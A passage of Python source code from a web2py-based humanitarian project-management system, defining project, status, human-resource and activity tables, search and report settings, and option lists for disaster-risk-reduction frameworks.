OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ["S3ProjectModel",
"S3ProjectActivityModel",
"S3ProjectActivityTypeModel",
"S3ProjectActivityOrganisationModel",
"S3ProjectAnnualBudgetModel",
"S3ProjectBeneficiaryModel",
"S3ProjectCampaignModel",
"S3ProjectFrameworkModel",
"S3ProjectHazardModel",
"S3ProjectLocationModel",
"S3ProjectOrganisationModel",
"S3ProjectOutputModel",
"S3ProjectSectorModel",
"S3ProjectThemeModel",
"S3ProjectDRRModel",
"S3ProjectDRRPPModel",
"S3ProjectTaskModel",
"S3ProjectTaskHRMModel",
"S3ProjectTaskIReportModel",
"project_rheader",
"project_task_form_inject",
"project_task_controller",
]
import datetime
try:
import json # try stdlib (Python 2.6)
except ImportError:
try:
import simplejson as json # try external module
except:
import gluon.contrib.simplejson as json # fallback to pure-Python module
try:
# Python 2.7
from collections import OrderedDict
except:
# Python 2.6
from gluon.contrib.simplejson.ordered_dict import OrderedDict
from gluon import *
from gluon.dal import Row
from gluon.storage import Storage
from ..s3 import *
from s3layouts import S3AddResourceLink
# =============================================================================
class S3ProjectModel(S3Model):
"""
Project Model
Note: This module can be extended by 2 different modes:
- '3w': "Who's doing What Where"
suitable for use by multinational organisations tracking
projects at a high level
- sub-mode 'drr': Disaster Risk Reduction extensions
- 'task': Suitable for use by a smaller organisation tracking tasks
within projects
There are also a number of other deployment_settings to control behaviour
This class contains the tables common to all uses
There are additional tables in other Models
"""
names = ["project_status",
"project_project",
"project_project_id",
"project_project_represent",
"project_human_resource",
"project_hfa_opts",
"project_jnap_opts",
"project_pifacc_opts",
"project_rfa_opts",
"project_theme_opts",
"project_theme_helps",
"project_hazard_opts",
"project_hazard_helps",
]
def model(self):
    """
    Define the project_status, project_project and
    project_human_resource tables, configure their CRUD behaviour,
    search methods and components, and return the reusable fields
    and option/help callables for global scope (s3.*).

    Which fields, search widgets and components are active is
    driven by deployment_settings (3w/task/drr modes, codes,
    sectors, multiple budgets/organisations).
    """

    T = current.T
    db = current.db
    auth = current.auth

    NONE = current.messages["NONE"]

    human_resource_id = self.hrm_human_resource_id

    # Deployment settings controlling the active mode/features
    settings = current.deployment_settings
    mode_3w = settings.get_project_mode_3w()
    mode_task = settings.get_project_mode_task()
    mode_drr = settings.get_project_mode_drr()
    use_codes = settings.get_project_codes()
    use_sectors = settings.get_project_sectors()
    multi_budgets = settings.get_project_multiple_budgets()
    multi_orgs = settings.get_project_multiple_organisations()

    add_component = self.add_component
    configure = self.configure
    crud_strings = current.response.s3.crud_strings
    define_table = self.define_table
    set_method = self.set_method

    # ---------------------------------------------------------------------
    # Project Statuses
    #
    tablename = "project_status"
    table = define_table(tablename,
                         Field("name", length=128,
                               notnull=True, unique=True,
                               label=T("Name")),
                         s3_comments(),
                         *s3_meta_fields())

    # CRUD Strings
    ADD_STATUS = T("Add Status")
    crud_strings[tablename] = Storage(
        title_create = ADD_STATUS,
        title_display = T("Status Details"),
        title_list = T("Statuses"),
        title_update = T("Edit Status"),
        #title_upload = T("Import Statuses"),
        subtitle_create = T("Add New Status"),
        label_list_button = T("List Statuses"),
        label_create_button = ADD_STATUS,
        label_delete_button = T("Delete Status"),
        msg_record_created = T("Status added"),
        msg_record_modified = T("Status updated"),
        msg_record_deleted = T("Status deleted"),
        msg_list_empty = T("No Statuses currently registered"))

    # Reusable Field
    represent = S3Represent(lookup=tablename, translate=True)
                            #none = T("Unknown"))
    status_id = S3ReusableField("status_id", table,
                                label = T("Status"),
                                sortby = "name",
                                requires = IS_NULL_OR(
                                            IS_ONE_OF(db, "project_status.id",
                                                      represent,
                                                      sort=True)),
                                represent = represent,
                                comment = S3AddResourceLink(title=ADD_STATUS,
                                                            c="project",
                                                            f="status"),
                                ondelete = "SET NULL")

    # ---------------------------------------------------------------------
    # Projects
    #
    LEAD_ROLE = settings.get_project_organisation_lead_role()
    org_label = settings.get_project_organisation_roles()[LEAD_ROLE]

    tablename = "project_project"
    table = define_table(tablename,
                         self.super_link("doc_id", "doc_entity"),
                         # multi_orgs deployments use the separate project_organisation table
                         # - although Lead Org is still cached here to avoid the need for a virtual field to lookup
                         self.org_organisation_id(
                            label = org_label,
                            default = auth.root_org(),
                            requires = self.org_organisation_requires(
                                         required = True,
                                         # Only allowed to add Projects for Orgs that the user has write access to
                                         updateable = True,
                                         ),
                            ),
                         Field("name", unique=True, length=255,
                               label = T("Project Name"),
                               # Require unique=True if using IS_NOT_ONE_OF like here (same table,
                               # no filter) in order to allow both automatic indexing (faster)
                               # and key-based de-duplication (i.e. before field validation)
                               requires = [IS_NOT_EMPTY(error_message=T("Please fill this!")),
                                           IS_NOT_ONE_OF(db, "project_project.name")]
                               ),
                         Field("code",
                               label = T("Short Title / ID"),
                               readable = use_codes,
                               writable = use_codes,
                               ),
                         Field("description", "text",
                               label = T("Description")),
                         status_id(),
                         # NB There is additional client-side validation for start/end date in the Controller
                         s3_date("start_date",
                                 label = T("Start Date")
                                 ),
                         s3_date("end_date",
                                 label = T("End Date")
                                 ),
                         # Free-text field with no validation (used by OCHA template currently)
                         Field("duration",
                               label = T("Duration"),
                               readable=False,
                               writable=False,
                               ),
                         Field("calendar",
                               label = T("Calendar"),
                               readable = mode_task,
                               writable = mode_task,
                               requires = IS_NULL_OR(IS_URL()),
                               comment = DIV(_class="tooltip",
                                             _title="%s|%s" % (T("Calendar"),
                                                               T("URL to a Google Calendar to display on the project timeline.")))),
                         # multi_budgets deployments handle on the Budgets Tab
                         Field("budget", "double",
                               readable = False if multi_budgets else True,
                               writable = False if multi_budgets else True,
                               label = T("Budget"),
                               represent = lambda v: \
                                IS_FLOAT_AMOUNT.represent(v, precision=2)),
                         s3_currency(readable = False if multi_budgets else True,
                                     writable = False if multi_budgets else True,
                                     ),
                         Field("objectives", "text",
                               readable = mode_3w,
                               writable = mode_3w,
                               represent = lambda v: v or NONE,
                               label = T("Objectives")),
                         human_resource_id(label=T("Contact Person")),
                         s3_comments(comment=DIV(_class="tooltip",
                                                 _title="%s|%s" % (T("Comments"),
                                                                   T("Outcomes, Impact, Challenges")))),
                         *s3_meta_fields())

    # CRUD Strings
    ADD_PROJECT = T("Add Project")
    crud_strings[tablename] = Storage(
        title_create = ADD_PROJECT,
        title_display = T("Project Details"),
        title_list = T("Projects"),
        title_update = T("Edit Project"),
        title_search = T("Search Projects"),
        title_report = T("Project Report"),
        title_upload = T("Import Projects"),
        subtitle_create = T("Add New Project"),
        label_list_button = T("List Projects"),
        label_create_button = ADD_PROJECT,
        label_delete_button = T("Delete Project"),
        msg_record_created = T("Project added"),
        msg_record_modified = T("Project updated"),
        msg_record_deleted = T("Project deleted"),
        msg_list_empty = T("No Projects currently registered"))

    # Search Method
    status_search_widget = S3SearchOptionsWidget(
        name = "project_search_status",
        label = T("Status"),
        field = "status_id",
        cols = 4,
        )
    simple = [
        S3SearchSimpleWidget(name = "project_search_text_advanced",
                             label = T("Description"),
                             comment = T("Search for a Project by name, code, or description."),
                             field = ["name",
                                      "code",
                                      "description",
                                      ]
                             ),
        status_search_widget,
        ]
    # Advanced search = simple search + mode-dependent option widgets
    advanced = list(simple)
    append = advanced.append

    append(S3SearchOptionsWidget(
        name = "project_search_organisation_id",
        label = org_label,
        field = "organisation_id",
        cols = 3
        ))
    append(S3SearchOptionsWidget(
        name = "project_search_L0",
        field = "location.location_id$L0",
        location_level="L0",
        cols = 3
        ))
    append(S3SearchOptionsWidget(
        name = "project_search_L1",
        field = "location.location_id$L1",
        location_level="L1",
        cols = 3
        ))
    #append(S3SearchOptionsWidget(
    #        name = "project_search_L2",
    #        label = T("Countries"),
    #        field = "location.location_id$L2",
    #        location_level="L2",
    #        cols = 3
    #        ))

    if use_sectors:
        if settings.get_ui_label_cluster():
            sector = T("Cluster")
        else:
            sector = T("Sector")
        append(S3SearchOptionsWidget(
            name = "project_search_sector",
            label = sector,
            field = "sector.id",
            options = self.org_sector_opts,
            cols = 4
            ))
    if mode_drr:
        append(S3SearchOptionsWidget(
            name = "project_search_hazard",
            label = T("Hazard"),
            field = "hazard.id",
            options = self.project_hazard_opts,
            help_field = self.project_hazard_helps,
            cols = 4
            ))
    if mode_3w:
        append(S3SearchOptionsWidget(
            name = "project_search_theme",
            label = T("Theme"),
            field = "theme.id",
            options = self.project_theme_opts,
            help_field = self.project_theme_helps,
            cols = 4
            ))
    if mode_drr:
        project_hfa_opts = self.project_hfa_opts()
        options = {}
        #options = {None:NONE} To search NO HFA
        for key in project_hfa_opts.keys():
            options[key] = "HFA %s" % key
        append(S3SearchOptionsWidget(
            name = "project_search_hfa",
            label = T("HFA"),
            field = "drr.hfa",
            options = options,
            help_field = project_hfa_opts,
            cols = 5
            ))
    if multi_orgs:
        append(S3SearchOptionsWidget(
            name = "project_search_partners",
            field = "partner.organisation_id",
            label = T("Partners"),
            cols = 3,
            ))
        append(S3SearchOptionsWidget(
            name = "project_search_donors",
            field = "donor.organisation_id",
            label = T("Donors"),
            cols = 3,
            ))
    project_search = S3Search(simple = simple,
                              advanced = advanced)

    # Resource Configuration
    # create_next: where to redirect after creating a project,
    # depending on the active mode
    if settings.get_project_theme_percentages():
        create_next = URL(c="project", f="project",
                          args=["[id]", "theme"])
    elif mode_task:
        if settings.get_project_milestones():
            create_next = URL(c="project", f="project",
                              args=["[id]", "milestone"])
        else:
            create_next = URL(c="project", f="project",
                              args=["[id]", "task"])
    else:
        # Default
        create_next = None

    # List fields vary by mode (NB: 'append' rebound here to list_fields)
    list_fields = ["id"]
    append = list_fields.append
    if use_codes:
        append("code")
    append("name")
    append("organisation_id")
    if mode_3w:
        append((T("Locations"), "location.location_id"))
    if use_sectors:
        append((T("Sectors"), "sector.name"))
    if mode_drr:
        append((T("Hazards"), "hazard.name"))
        #append("drr.hfa")
    append((T("Themes"), "theme.name"))
    if multi_orgs:
        table.total_organisation_amount = Field.Lazy(self.project_total_organisation_amount)
        append((T("Total Funding Amount"), "total_organisation_amount"))
    if multi_budgets:
        table.total_annual_budget = Field.Lazy(self.project_total_annual_budget)
        append((T("Total Annual Budget"), "total_annual_budget"))
    append("start_date")
    append("end_date")

    # NOTE: report_fields aliases list_fields (same list object)
    report_fields = list_fields
    report_col_default = "location.location_id"
    report_fact_fields = [(field, "count") for field in report_fields]
    report_fact_default = "project.organisation_id"
    #report_fact_default = "theme.name"

    configure(tablename,
              super_entity="doc_entity",
              deduplicate=self.project_project_deduplicate,
              onaccept=self.project_project_onaccept,
              create_next=create_next,
              search_method=project_search,
              list_fields=list_fields,
              report_options=Storage(
                search = [status_search_widget] + advanced,
                rows=report_fields,
                cols=report_fields,
                fact=report_fact_fields,
                defaults=Storage(
                    rows="hazard.name",
                    cols=report_col_default,
                    fact=report_fact_default,
                    aggregate="count",
                    totals=True
                    )
                ),
              context = {"location": "location.location_id",
                         "organisation": "organisation_id",
                         },
              realm_components = ["human_resource",
                                  "task",
                                  "organisation",
                                  "activity",
                                  "activity_type",
                                  "annual_budget",
                                  "beneficiary",
                                  "location",
                                  "milestone",
                                  "theme_percentage",
                                  "document",
                                  "image",
                                  ],
              update_realm=True,
              )

    # Reusable Field
    if use_codes:
        project_represent = S3Represent(lookup=tablename,
                                        field_sep = ": ",
                                        fields=["code", "name"])
    else:
        project_represent = S3Represent(lookup=tablename)
    project_id = S3ReusableField("project_id", table,
        sortby="name",
        requires = IS_NULL_OR(
                    IS_ONE_OF(db(auth.s3_accessible_query("update",
                                                          table)),
                              "project_project.id",
                              project_represent)),
        represent = project_represent,
        comment = S3AddResourceLink(c="project", f="project",
                                    tooltip=T("If you don't see the project in the list, you can add a new one by clicking link 'Add Project'.")),
        label = T("Project"),
        ondelete = "CASCADE"
        )

    # Custom Methods
    set_method("project", "project",
               method="timeline",
               action=self.project_timeline)

    set_method("project", "project",
               method="map",
               action=self.project_map)

    # Components
    if multi_orgs:
        # Organisations
        add_component("project_organisation", project_project="project_id")
        # Donors
        add_component("project_organisation",
                      project_project=dict(
                        name="donor",
                        joinby="project_id",
                        filterby="role",
                        filterfor=[3], # Works for IFRC & DRRPP
                        ))
        # Partners
        add_component("project_organisation",
                      project_project=dict(
                        name="partner",
                        joinby="project_id",
                        filterby="role",
                        filterfor=[2, 9], # Works for IFRC & DRRPP
                        ))

    # Sites
    #add_component("project_site", project_project="project_id")

    # Activities
    add_component("project_activity", project_project="project_id")

    # Activity Types
    add_component("project_activity_type",
                  project_project=dict(link="project_activity_type_project",
                                       joinby="project_id",
                                       key="activity_type_id",
                                       actuate="link"))

    # Milestones
    add_component("project_milestone", project_project="project_id")

    # Outputs
    add_component("project_output", project_project="project_id")

    # Tasks
    add_component("project_task",
                  project_project=dict(link="project_task_project",
                                       joinby="project_id",
                                       key="task_id",
                                       actuate="replace",
                                       autocomplete="name",
                                       autodelete=False))

    # Annual Budgets
    add_component("project_annual_budget", project_project="project_id")

    # Beneficiaries
    add_component("project_beneficiary", project_project="project_id")

    # Hazards
    add_component("project_hazard",
                  project_project=dict(link="project_hazard_project",
                                       joinby="project_id",
                                       key="hazard_id",
                                       actuate="hide"))

    # Human Resources
    add_component("project_human_resource", project_project="project_id")

    # Locations
    add_component("project_location", project_project="project_id")

    # Sectors
    add_component("org_sector",
                  project_project=dict(link="project_sector_project",
                                       joinby="project_id",
                                       key="sector_id",
                                       actuate="hide"))
    # Format needed by S3Filter
    add_component("project_sector_project",
                  project_project="project_id")

    # Themes
    add_component("project_theme",
                  project_project=dict(link="project_theme_project",
                                       joinby="project_id",
                                       key="theme_id",
                                       actuate="hide"))
    # Format needed by S3Filter
    add_component("project_theme_project",
                  project_project="project_id")

    # DRR
    if mode_drr:
        add_component("project_drr",
                      project_project=dict(joinby="project_id",
                                           multiple = False))

    # ---------------------------------------------------------------------
    # Project Human Resources
    #
    define_table("project_human_resource",
                 project_id(empty=False),
                 human_resource_id(empty=False),
                 *s3_meta_fields()
                 )

    configure("project_human_resource",
              onvalidation=self.project_human_resource_onvalidation,
              list_fields=[#"project_id",
                           "human_resource_id$person_id",
                           "human_resource_id$organisation_id",
                           "human_resource_id$job_title",
                           "human_resource_id$status"
                           ],
              )

    # ---------------------------------------------------------------------
    # Pass names back to global scope (s3.*)
    #
    return dict(
        project_project_id = project_id,
        project_project_represent = project_represent,
        project_hfa_opts = self.project_hfa_opts,
        project_jnap_opts = self.project_jnap_opts,
        project_pifacc_opts = self.project_pifacc_opts,
        project_rfa_opts = self.project_rfa_opts,
        project_theme_opts = self.project_theme_opts,
        project_theme_helps = self.project_theme_helps,
        project_hazard_opts = self.project_hazard_opts,
        project_hazard_helps = self.project_hazard_helps,
        )
# -------------------------------------------------------------------------
def defaults(self):
    """
    Return safe fallbacks for the model-global names when the
    project module is disabled.
    """
    placeholder = S3ReusableField("dummy_id", "integer",
                                  readable=False,
                                  writable=False)

    def project_project_id(**attr):
        # Same signature as the real reusable field factory
        return placeholder("project_id")

    return {"project_project_id": project_project_id}
# -------------------------------------------------------------------------
@staticmethod
def project_total_organisation_amount(row):
    """
    Field.Lazy: total of the project_organisation amounts for
    a project.

    @param row: the (possibly joined) project_project Row
    @return: the summed amount, or 0 if the project cannot be
             resolved or has no organisation amounts
    """

    if "project_project" in row:
        project_id = row["project_project.id"]
    elif "id" in row:
        project_id = row["id"]
    else:
        return 0

    table = current.s3db.project_organisation
    query = (table.deleted != True) & \
            (table.project_id == project_id)
    sum_field = table.amount.sum()
    # SUM() over an empty set yields NULL (None): report 0 instead,
    # consistent with the unresolvable-row fallback above
    total = current.db(query).select(sum_field).first()[sum_field]
    return total or 0
# -------------------------------------------------------------------------
@staticmethod
def project_total_annual_budget(row):
    """
    Field.Lazy: total of all annual budgets for a project
    (falls back to the NONE message when there are no budgets).
    """

    if "project_project" in row:
        record_id = row["project_project.id"]
    elif "id" in row:
        record_id = row["id"]
    else:
        return 0

    btable = current.s3db.project_annual_budget
    total = btable.amount.sum()
    query = (btable.deleted != True) & \
            (btable.project_id == record_id)
    result = current.db(query).select(total).first()
    return result[total] or current.messages["NONE"]
# -------------------------------------------------------------------------
@staticmethod
def project_project_onaccept(form):
    """
    onaccept for project_project: in multi-organisation
    deployments, keep the lead project_organisation link in sync
    with the organisation_id cached on the project record.
    """

    settings = current.deployment_settings
    if not settings.get_project_multiple_organisations():
        return

    # organisation_id is not in form.vars if added via a component tab
    form_vars = form.vars
    organisation_id = form_vars.organisation_id or \
                      current.request.post_vars.organisation_id
    if not organisation_id:
        return

    project_id = form_vars.id
    lead_role = settings.get_project_organisation_lead_role()

    otable = current.s3db.project_organisation
    query = (otable.project_id == project_id) & \
            (otable.role == lead_role)

    # Update the existing lead-organisation link...
    updated = current.db(query).update(organisation_id=organisation_id)
    if not updated:
        # ...or create it if there was none
        otable.insert(project_id=project_id,
                      organisation_id=organisation_id,
                      role=lead_role,
                      )
# -------------------------------------------------------------------------
@staticmethod
def project_project_deduplicate(item):
    """
    Import item de-duplication for project_project:
    match by code when available, otherwise by name.
    """

    if item.tablename != "project_project":
        return

    data = item.data
    table = item.table

    # If we have a code, then assume this is unique, however the same
    # project name may be used in multiple locations
    if "code" in data and data.code:
        query = (table.code.lower() == data.code.lower())
    elif "name" in data and data.name:
        query = (table.name.lower() == data.name.lower())
    else:
        # Nothing we can work with
        return

    original = current.db(query).select(table.id,
                                        limitby=(0, 1)).first()
    if original:
        item.id = original.id
        item.method = item.METHOD.UPDATE
# -------------------------------------------------------------------------
@staticmethod
def project_map(r, **attr):
    """
    Custom method: display a filterable set of Projects on a Map
    - assumes mode_3w
    - currently assumes that theme_percentages=True

    @ToDo: Browse by Year

    @param r: the S3Request
    @param attr: controller attributes
    @raise HTTP 501: for any representation other than interactive
                     HTML on the project resource
    """

    if r.representation == "html" and \
       r.name == "project":

        T = current.T
        db = current.db
        s3db = current.s3db
        response = current.response

        # NOTE(review): accessing the tables also ensures the
        # respective models are loaded — verify before removing
        ptable = s3db.project_project
        ttable = s3db.project_theme
        tptable = s3db.project_theme_project
        ltable = s3db.gis_location

        # Search Widget: multi-select over all themes, all pre-selected
        themes_dropdown = SELECT(_multiple=True,
                                 _id="project_theme_id",
                                 _style="height:80px;")
        append = themes_dropdown.append
        themes = db(ttable.deleted == False).select(ttable.id,
                                                    ttable.name,
                                                    orderby=ttable.name)
        for theme in themes:
            append(OPTION(theme.name,
                          _value=theme.id,
                          _selected="selected"))
        form = FORM(themes_dropdown)

        # Map
        # The Layer of Projects to show on the Map
        # @ToDo: Create a URL to the project_polygons custom method & use that
        # @ToDo: Pass through attributes that we don't need for the 1st level of mapping
        #        so that they can be used without a screen refresh
        url = URL(f="location", extension="geojson")
        layer = {"name" : T("Projects"),
                 "id" : "projects",
                 "tablename" : "project_location",
                 "url" : url,
                 "active" : True,
                 #"marker" : None,
                 }

        map_widget = current.gis.show_map(collapsed = True,
                                          feature_resources = [layer],
                                          )

        output = dict(title = T("Projects Map"),
                      form = form,
                      map = map_widget,
                      )

        # Add Static JS
        response.s3.scripts.append(URL(c="static",
                                       f="scripts",
                                       args=["S3", "s3.project_map.js"]))

        response.view = "map.html"
        return output
    else:
        raise HTTP(501, current.messages.BADMETHOD)
# -------------------------------------------------------------------------
@staticmethod
def project_polygons(r, **attr):
    """
    Export Projects as GeoJSON Polygons to view on the map
    - currently assumes that theme_percentages=True

    @ToDo: complete
    NOTE(review): unfinished — the final loop over locations does
    nothing and the method always returns an empty JSON object.
    """

    db = current.db
    s3db = current.s3db
    ptable = s3db.project_project
    ttable = s3db.project_theme
    tptable = s3db.project_theme_project
    pltable = s3db.project_location
    ltable = s3db.gis_location

    # Currently only used by the commented-out theme filter below
    vars = current.request.get_vars

    themes = db(ttable.deleted == False).select(ttable.id,
                                                ttable.name,
                                                orderby = ttable.name)

    # Total the Budget spent by Theme for each country
    countries = {}
    query = (ptable.deleted == False) & \
            (tptable.project_id == ptable.id) & \
            (ptable.id == pltable.project_id) & \
            (ltable.id == pltable.location_id)
    #if "theme_id" in vars:
    #    query = query & (tptable.id.belongs(vars.theme_id))
    projects = db(query).select()
    for project in projects:
        # Only show those projects which are only within 1 country
        # @ToDo
        # NOTE(review): presumably a list of country location ids
        # from the join — confirm against the query above
        _countries = project.location_id
        if len(_countries) == 1:
            country = _countries[0]
            if country in countries:
                # Accumulate onto the existing per-country totals
                budget = project.project_project.total_annual_budget()
                theme = project.project_theme_project.theme_id
                percentage = project.project_theme_project.percentage
                countries[country][theme] += budget * percentage
            else:
                name = db(ltable.id == country).select(ltable.name).first().name
                countries[country] = dict(name = name)
                # Init all themes to 0
                for theme in themes:
                    countries[country][theme.id] = 0
                # Add value for this record
                budget = project.project_project.total_annual_budget()
                theme = project.project_theme_project.theme_id
                percentage = project.project_theme_project.percentage
                countries[country][theme] += budget * percentage

    query = (ltable.id.belongs(countries))
    locations = db(query).select(ltable.id,
                                 ltable.wkt)
    for location in locations:
        # @ToDo: build GeoJSON features from location.wkt
        pass

    # Convert to GeoJSON
    output = json.dumps({})

    current.response.headers["Content-Type"] = "application/json"
    return output
# -------------------------------------------------------------------------
@staticmethod
def project_timeline(r, **attr):
    """
    Custom method: display the project on a Simile Timeline

    http://www.simile-widgets.org/wiki/Reference_Documentation_for_Timeline

    Currently this just displays a Google Calendar

    @ToDo: Add Milestones
    @ToDo: Filters for different 'layers'
    @ToDo: export milestones/tasks as .ics
    """

    if r.representation != "html" or r.name != "project":
        raise HTTP(501, current.messages.BADMETHOD)

    appname = current.request.application
    response = current.response
    s3 = response.s3

    calendar = r.record.calendar

    # Add core Simile Code
    s3.scripts.append("/%s/static/scripts/simile/timeline/timeline-api.js" % appname)

    # Pass vars to our JS code
    s3.js_global.append('''S3.timeline.calendar="%s"''' % calendar)

    # Add our control script (minified unless debugging)
    script = "s3.timeline.js" if s3.debug else "s3.timeline.min.js"
    s3.scripts.append("/%s/static/scripts/S3/%s" % (appname, script))

    # Create the DIV the timeline renders into
    timeline_div = DIV(_id="s3timeline",
                       _style="height:400px;border:1px solid #aaa;font-family:Trebuchet MS,sans-serif;font-size:85%;")

    output = {"item": timeline_div,
              "title": current.T("Project Calendar"),
              }

    # Maintain RHeader for consistency
    if "rheader" in attr:
        rheader = attr["rheader"](r)
        if rheader:
            output["rheader"] = rheader

    response.view = "timeline.html"
    return output
# -------------------------------------------------------------------------
@staticmethod
def project_human_resource_onvalidation(form):
    """
    Prevent the same hrm_human_resource record being linked to
    the same project more than once.
    """

    htable = current.s3db.project_human_resource

    # Look for an existing link with the same project + human resource
    query = (htable.human_resource_id == form.vars.human_resource_id) & \
            (htable.project_id == form.request_vars.project_id)
    duplicate = current.db(query).select(htable.id,
                                         limitby=(0, 1)).first()

    # If we found a row we have a duplicate. Return an error to the user.
    if duplicate:
        form.errors.human_resource_id = current.T("Record already exists")
# -------------------------------------------------------------------------
@staticmethod
def project_hazard_opts():
    """
    Provide the options for the Hazard search filter
    - defined in the model used to ensure a good load order
    """

    table = current.s3db.project_hazard
    rows = current.db(table.deleted == False).select(table.id,
                                                     table.name,
                                                     orderby=table.name)
    T = current.T
    # Ordered so the filter lists hazards alphabetically
    return OrderedDict((row.id, T(row.name) if row.name else "")
                       for row in rows)
# -------------------------------------------------------------------------
@staticmethod
def project_hazard_helps():
    """
    Provide the help tooltips for the Hazard search filter
    - defined in the model used to ensure a good load order
    """

    table = current.s3db.project_hazard
    rows = current.db(table.deleted == False).select(table.id,
                                                     table.comments)
    T = current.T
    return dict((row.id, T(row.comments) if row.comments else "")
                for row in rows)
# -------------------------------------------------------------------------
@staticmethod
def project_hfa_opts():
    """
    Provide the options for the HFA search filter
    - defined in the model used to ensure a good load order

    HFA: Hyogo Framework Agreement
    """

    T = current.T
    priorities = (
        T("HFA1: Ensure that disaster risk reduction is a national and a local priority with a strong institutional basis for implementation."),
        T("HFA2: Identify, assess and monitor disaster risks and enhance early warning."),
        T("HFA3: Use knowledge, innovation and education to build a culture of safety and resilience at all levels."),
        T("HFA4: Reduce the underlying risk factors."),
        T("HFA5: Strengthen disaster preparedness for effective response at all levels."),
        )
    # Keys are the HFA priority numbers 1..5
    return dict((number, label)
                for number, label in enumerate(priorities, 1))
# -------------------------------------------------------------------------
@staticmethod
def project_jnap_opts():
    """
    Provide the options for the JNAP search filter (currently unused)
    - defined in the model used to ensure a good load order

    JNAP (Joint National Action Plan for Disaster Risk Management and Climate Change Adaptation):
     applies to Cook Islands only
    """

    T = current.T
    return {
        1: T("JNAP-1: Strategic Area 1: Governance"),
        2: T("JNAP-2: Strategic Area 2: Monitoring"),
        3: T("JNAP-3: Strategic Area 3: Disaster Management"),
        4: T("JNAP-4: Strategic Area 4: Risk Reduction and Climate Change Adaptation"),
        }
# -------------------------------------------------------------------------
@staticmethod
def project_pifacc_opts():
    """
    Provide the options for the PIFACC search filter (currently unused)
    - defined in the model used to ensure a good load order

    PIFACC (Pacific Islands Framework for Action on Climate Change):
     applies to Pacific countries only
    """

    T = current.T
    themes = (
        T("PIFACC-1: Implementing Tangible, On-Ground Adaptation Measures"),
        T("PIFACC-2: Governance and Decision Making"),
        T("PIFACC-3: Improving our understanding of climate change"),
        T("PIFACC-4: Education, Training and Awareness"),
        T("PIFACC-5: Mitigation of Global Greenhouse Gas Emissions"),
        T("PIFACC-6: Partnerships and Cooperation"),
        )
    # Keys are the PIFACC theme numbers 1..6
    return dict((number, label)
                for number, label in enumerate(themes, 1))
# -------------------------------------------------------------------------
@staticmethod
def project_rfa_opts():
    """
    Provide the options for the RFA search filter
    - defined in the model used to ensure a good load order

    RFA: applies to Pacific countries only
    """

    T = current.T
    themes = (
        T("RFA1: Governance-Organisational, Institutional, Policy and Decision Making Framework"),
        T("RFA2: Knowledge, Information, Public Awareness and Education"),
        T("RFA3: Analysis and Evaluation of Hazards, Vulnerabilities and Elements at Risk"),
        T("RFA4: Planning for Effective Preparedness, Response and Recovery"),
        T("RFA5: Effective, Integrated and People-Focused Early Warning Systems"),
        T("RFA6: Reduction of Underlying Risk Factors"),
        )
    # Keys are the RFA theme numbers 1..6
    return dict((number, label)
                for number, label in enumerate(themes, 1))
# -------------------------------------------------------------------------
@staticmethod
def project_theme_opts():
    """
    Provide the options for the Theme search filter
    - defined in the model used to ensure a good load order
    """

    table = current.s3db.project_theme
    rows = current.db(table.deleted == False).select(table.id,
                                                     table.name,
                                                     orderby=table.name)
    T = current.T
    # Ordered so the filter lists themes alphabetically
    return OrderedDict((row.id, T(row.name) if row.name else "")
                       for row in rows)
# -------------------------------------------------------------------------
@staticmethod
def project_theme_helps():
    """
    Provide the help tooltips for the Theme search filter
    - defined in the model used to ensure a good load order
    """

    table = current.s3db.project_theme
    rows = current.db(table.deleted == False).select(table.id,
                                                     table.comments)
    T = current.T
    return dict((row.id, T(row.comments) if row.comments else "")
                for row in rows)
# =============================================================================
class S3ProjectActivityModel(S3Model):
"""
Project Activity Model
This model holds the specific Activities for Projects
- currently used in mode_task but not mode_3w
"""
names = ["project_activity",
"project_activity_id",
"project_activity_activity_type",
]
def model(self):
T = current.T
db = current.db
add_component = self.add_component
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
settings = current.deployment_settings
mode_task = settings.get_project_mode_task()
# ---------------------------------------------------------------------
# Project Activity
#
tablename = "project_activity"
table = define_table(tablename,
# Instance
self.super_link("doc_id", "doc_entity"),
s3_datetime(),
self.project_project_id(),
Field("name",
label = T("Name"),
requires = IS_NOT_EMPTY()
),
self.project_activity_type_id(),
self.gis_location_id(
widget = S3LocationSelectorWidget(hide_address=True)
),
# Which contact is this?
# Implementing Org should be a human_resource_id
# Beneficiary could be a person_id
# Either way label should be clear
self.pr_person_id(label=T("Contact Person")),
Field("time_estimated", "double",
readable = mode_task,
writable = mode_task,
label = "%s (%s)" % (T("Time Estimate"),
T("hours"))
),
Field("time_actual", "double",
readable = mode_task,
# Gets populated from constituent Tasks
writable = False,
label = "%s (%s)" % (T("Time Taken"),
T("hours"))
),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ACTIVITY = T("Activity")
ACTIVITY_TOOLTIP = T("If you don't see the activity in the list, you can add a new one by clicking link 'Add Activity'.")
ADD_ACTIVITY = T("Add Activity")
crud_strings[tablename] = Storage(
title_create = ADD_ACTIVITY,
title_display = T("Activity Details"),
title_list = T("Activities"),
title_update = T("Edit Activity"),
title_search = T("Search Activities"),
title_upload = T("Import Activity Data"),
title_report = T("Activity Report"),
subtitle_create = T("Add New Activity"),
label_list_button = T("List Activities"),
label_create_button = ADD_ACTIVITY,
msg_record_created = T("Activity Added"),
msg_record_modified = T("Activity Updated"),
msg_record_deleted = T("Activity Deleted"),
msg_list_empty = T("No Activities Found")
)
# Search Method
filter_widgets = [S3OptionsFilter("activity_type_id",
label=T("Type"),
represent="%(name)s",
widget="multiselect",
),
]
# Resource Configuration
report_fields = []
append = report_fields.append
append((T("Project"), "project_id"))
append((T("Activity"), "name"))
append((T("Activity Type"), "activity_type.name"))
if settings.get_project_sectors():
append((T("Sector"), "project_id$sector.name"))
append((T("Theme"), "project_id$theme.name"))
if settings.get_project_mode_drr():
append((T("Hazard"), "project_id$hazard.name"))
append((T("HFA"), "project_id$drr.hfa"))
list_fields = ["name",
"project_id",
"activity_type.name",
"comments"
]
if mode_task:
list_fields.insert(3, "time_estimated")
list_fields.insert(4, "time_actual")
append((T("Time Estimated"), "time_estimated"))
append((T("Time Actual"), "time_actual"))
#create_next = URL(c="project", f="activity",
# args=["[id]", "task"])
#else:
# create_next = URL(c="project", f="activity", args=["[id]"])
self.configure(tablename,
super_entity="doc_entity",
# Leave these workflows for Templates
#create_next=create_next,
deduplicate=self.project_activity_deduplicate,
filter_widgets = filter_widgets,
report_options=Storage(
rows=report_fields,
cols=report_fields,
fact=report_fields,
defaults=Storage(
rows="activity.project_id",
cols="activity.name",
fact="sum(activity.time_actual)",
